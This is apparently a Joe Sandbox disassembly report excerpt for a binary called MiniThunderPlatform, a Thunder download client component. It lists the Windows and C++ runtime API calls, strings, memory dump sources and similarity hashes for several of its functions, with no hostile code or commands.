                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$V01@@$??0exception@@?append@?$basic_string@ErrorExceptionH_prologLastRecvThrowV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: .\asyn_socket_device_imp.cpp$asyn read request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$expected_bytes != 0$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 13881806-2724939351
                                                                                                                                              • Opcode ID: 7ef705b6161c5188384e82cebf4392e19fc382826afcca971ba5ab518a283ed9
                                                                                                                                              • Instruction ID: 65d43b036a61228c3e0791f6634e7851dfa5d98b26cc0f952be066ab8f619dbf
                                                                                                                                              • Opcode Fuzzy Hash: 7ef705b6161c5188384e82cebf4392e19fc382826afcca971ba5ab518a283ed9
                                                                                                                                              • Instruction Fuzzy Hash: CD51E175104B00AFC310DF64C880E6BB7E5FB98214F548A2DF6A987682E731F955CF92
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 0043247C
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_tp_sm_1266909420), ref: 004324A6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 004324C9
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004324DB
                                                                                                                                              • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,00100000,00000000), ref: 004324F8
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432528
                                                                                                                                              • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000), ref: 0043255B
                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000002,00000000,00000000,00000000), ref: 00432579
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71(?,00000002,00000000,00000000,00000000), ref: 004325A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_FileV01@Y?$basic_string@_$??0?$basic_string@_?data@?$basic_string@_CloseCreateHandleMappingV01@@View
                                                                                                                                              • String ID: _tp_sm_1266909420
                                                                                                                                              • API String ID: 243475080-2335214447
                                                                                                                                              • Opcode ID: a0fca0e788167b0341238bdc6e66679d4f3d8c6a2060f8ec2d5ad2e7ee007efb
                                                                                                                                              • Instruction ID: c2033785d92f39de1a6dfe5c69450b8ac8deb055c5409ea91e0a689f765f836f
                                                                                                                                              • Opcode Fuzzy Hash: a0fca0e788167b0341238bdc6e66679d4f3d8c6a2060f8ec2d5ad2e7ee007efb
                                                                                                                                              • Instruction Fuzzy Hash: E841D872D00608EFDB60EF68DC82BDC7770EB08314F51425AF915AB290CB79AD84CB99
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001AF40
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001AFAF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001AFF8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B048
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 1001B05C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B081
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prolog$FreeLibraryV01@@
                                                                                                                                              • String ID: .\DownloadLib.cpp$_asyn_frame$_asyn_frame->IsInAsynFrameThread() == S_OK$thunder_assert
                                                                                                                                              • API String ID: 3437135587-210221719
                                                                                                                                              • Opcode ID: 40ab9a568dd560af5c320348baaa8d80db5aeba2dfeced407b4ac729ffc541b8
                                                                                                                                              • Instruction ID: 27d2f071a1dbde6995dd5c02628617881719cf2f7eea1d106bc42b9ab57c5181
                                                                                                                                              • Opcode Fuzzy Hash: 40ab9a568dd560af5c320348baaa8d80db5aeba2dfeced407b4ac729ffc541b8
                                                                                                                                              • Instruction Fuzzy Hash: 4A415C35900118EFCB05DFE4CD89AEEBBB5FF19305F508199E006AB152DB70AA95CB61
                                                                                                                                              APIs
                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,Function_00035BD0), ref: 10048AD2
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048ADD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn write request error), ref: 10048AFD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10048B24
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionH_prologLastSendThrowV01@@
                                                                                                                                              • String ID: .\asyn_socket_device_imp.cpp$asyn write request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$expected_bytes != 0$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3461854569-3475813155
                                                                                                                                              • Opcode ID: 3dbc0bb995de0656480ce5994af82dfa82f34f7954392577c68ce85423481b1c
                                                                                                                                              • Instruction ID: 1a6c8ad856d925c6fc41f753efb66b1977f369286e06581f144acf9ac620270d
                                                                                                                                              • Opcode Fuzzy Hash: 3dbc0bb995de0656480ce5994af82dfa82f34f7954392577c68ce85423481b1c
                                                                                                                                              • Instruction Fuzzy Hash: F641BA72604740AFD310DF28CC40F9BBBE4FBA9208F148A1EF199D3682E771B5158B92
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB2B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB45
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EB5C
                                                                                                                                                • Part of subcall function 1006D7FE: __EH_prolog.LIBCMT ref: 1006D803
                                                                                                                                                • Part of subcall function 1006D7FE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006D833
                                                                                                                                                • Part of subcall function 1006D7FE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006D8A1
                                                                                                                                                • Part of subcall function 1006D7FE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006D8B5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EB95
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBA7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBB9
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006EBE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$V01@@$H_prolog$?append@?$basic_string@V12@V12@@
                                                                                                                                              • String ID: .td.cfg$cfg_suffix$temp_file
                                                                                                                                              • API String ID: 2327089072-1355609058
                                                                                                                                              • Opcode ID: 0cd4b5780d56d1d2a1a24418b979c958b7974a20e59e2a31d991a555d8df9a9c
                                                                                                                                              • Instruction ID: 1ad507df1bc475fcabe229ac2c60b1e3ea226ba5c962a60a4d8efec41bb8c724
                                                                                                                                              • Opcode Fuzzy Hash: 0cd4b5780d56d1d2a1a24418b979c958b7974a20e59e2a31d991a555d8df9a9c
                                                                                                                                              • Instruction Fuzzy Hash: D931F675008391DFD324CB64C888B9ABBE4FBA9754F048A4DF59A82291DB756109CF63
                                                                                                                                              APIs
                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00436A4A
                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 00436A5D
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00436A7E
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436AD6
                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00436AF3
                                                                                                                                              • ??$?8_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@PB_W@Z.MSVCP71(?,ShenZhen Thunder Networking Technologies Ltd.), ref: 00436B2C
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436B5C
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00436B8A
                                                                                                                                              Strings
                                                                                                                                              • ShenZhen Thunder Networking Technologies Ltd., xrefs: 00436B20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@std@@$FileW@2@@std@@$??1?$basic_string@_ExistsPath$??$?8_??0?$basic_string@_ModuleNameV?$basic_string@_W@1@@std@@W@2@@0@lstrcpy
                                                                                                                                              • String ID: ShenZhen Thunder Networking Technologies Ltd.
                                                                                                                                              • API String ID: 4027134674-823679711
                                                                                                                                              • Opcode ID: bffe227b7a8a68c5a4edfbaf2b8ae713173dcab9446071bc61f1e109dbbcbbec
                                                                                                                                              • Instruction ID: ca37a992bef3b65b0a3a5e7db0634d793f7c78e51c49cbd5fe67474e0670b129
                                                                                                                                              • Opcode Fuzzy Hash: bffe227b7a8a68c5a4edfbaf2b8ae713173dcab9446071bc61f1e109dbbcbbec
                                                                                                                                              • Instruction Fuzzy Hash: 3A41C77280062C9BCB60EB55DC86BDDB778AF04354F02029AE909A7191DF395FC8CBD9
                                                                                                                                              APIs
                                                                                                                                              • WSASendTo.WS2_32(?,?,00000001,?,00000000,?,00000010,?,Function_00035BD0), ref: 100517EB
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100517F7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn write request error), ref: 10051816
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10051839
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionH_prologLastSendThrowV01@@
                                                                                                                                              • String ID: .\asyn_udp_device.cpp$asyn write request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3461854569-1737582519
                                                                                                                                              • Opcode ID: 6ac6d84292adf02e26f3c9298f059792bcb23d75340b1c5e8e882a2fe6e710ad
                                                                                                                                              • Instruction ID: 37cd3e4c93ddf684bcf3db9c83c6192928767c09cc929a34241b9480232ee033
                                                                                                                                              • Opcode Fuzzy Hash: 6ac6d84292adf02e26f3c9298f059792bcb23d75340b1c5e8e882a2fe6e710ad
                                                                                                                                              • Instruction Fuzzy Hash: 09415976504740AFC320CF69C880B9BB7E9FB99614F508A1DF19A87641EB71A849CB61
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 10026D2F
                                                                                                                                              • GetLastError.KERNEL32 ref: 10026D39
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10026D74
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(write file error), ref: 10026D4A
                                                                                                                                                • Part of subcall function 1002BC50: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1002BC96
                                                                                                                                                • Part of subcall function 1002BC50: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ), ref: 1002BCA9
                                                                                                                                                • Part of subcall function 1002BC50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1002BCC8
                                                                                                                                                • Part of subcall function 1002BC50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002BCD6
                                                                                                                                              • GetLastError.KERNEL32(?,102B5DEC), ref: 10026D7F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(while write file,only part data write success), ref: 10026D90
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10026DC0
                                                                                                                                              Strings
                                                                                                                                              • while write file,only part data write success, xrefs: 10026D85
                                                                                                                                              • write file error, xrefs: 10026D3F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??1?$basic_string@?append@?$basic_string@FileV01@V01@@V12@V12@@WriteY?$basic_string@
                                                                                                                                              • String ID: while write file,only part data write success$write file error
                                                                                                                                              • API String ID: 3724975500-2030508876
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,0044FBB0), ref: 0042327D
                                                                                                                                              • SetEvent.KERNEL32(?), ref: 004232B0
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004232BF
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00423319
                                                                                                                                              • OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 00423330
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 0042334F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423368
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_CountEventMutexObjectOpenSingleTickWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3267940041-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100120DE
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,7C3869BF), ref: 1001212D
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 10012141
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,?,?,?,?,?), ref: 10012187
                                                                                                                                              • sprintf.MSVCR71(?,Version_%d_%d_%d_%d\,?,?,?,?,?,00000000,00000208,?,?,?,?,?), ref: 100121CE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100121E4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10012235
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@ModuleU?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@FileH_prologHandleNamememsetsprintf
                                                                                                                                              • String ID: Version_%d_%d_%d_%d\
                                                                                                                                              • API String ID: 1742427401-4290856180
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 0043194C
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_mini_tpstart_up_e_20130515_360), ref: 00431976
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 00431999
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004319AB
                                                                                                                                              • OpenEventW.KERNEL32(001F0003,00000000,00000000), ref: 004319C2
                                                                                                                                              • GetLastError.KERNEL32 ref: 004319D4
